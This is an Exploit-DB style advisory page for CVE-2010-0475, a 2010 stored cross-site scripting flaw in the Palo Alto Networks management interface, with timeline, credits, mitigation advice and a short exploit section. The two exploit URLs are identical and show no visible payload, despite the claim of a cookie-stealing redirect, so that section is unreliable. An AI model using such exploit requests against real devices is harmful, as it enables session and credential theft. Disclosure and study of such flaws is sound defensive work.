header-logo
Suggest Exploit
vendor:
Palo Alto Networks
by:
Jeromie Jackson CISSP, CISM
7,5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: Palo Alto Networks
Affected Version From: Latest Version Per December 31, 2009
Affected Version To: Latest Version Per December 31, 2009
Patch Exists: YES
Related CWE: CVE-2010-0475
CPE: a:palo_alto_networks:palo_alto_networks
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Palo Alto Network Vulnerability – Cross-Site Scripting (XSS)

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.

Mitigation:

It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.
Source

Exploit-DB raw data:

Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)
------------------------------

Class: Cross-Site Scripting (XSS) Vulnerability
*CVE: CVE-2010-0475 *
*Remote: Yes
Local: Yes
Published: May 11, 2010 08:30AM *
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response: 2/18/2010
Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)
*Credit: Jeromie Jackson CISSP, CISM*
        COBIT & ITIL Certified
        President- San Diego Open Web Application Security Project (OWASP)
        Vice President- San Diego Information Audit & Control Association
(ISACA)
        SANS Mentor
        LinkedIn: www.linkedin.com/in/securityassessment
        Blog: www.JeromieJackson.com
        Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:
   Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo
Alto interface. By crafting a URL that includes XSS code it is possible to
inject malicious data, redirect the user to a bogus replica of the real
website, or other nefarious activity.

Exploit:
Single Line working-
https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin


&admin-role=%5Bobject+Object%5D&bSubmit=O

WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O

Solution:
A patch will be required from the vendor. It is recommended a routine to
sanitize user input be consistently implemented throughout the application
to mitigate other such occurrences within the application.

References:
OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet

Navigation

Suggest Exploit

Services By CQR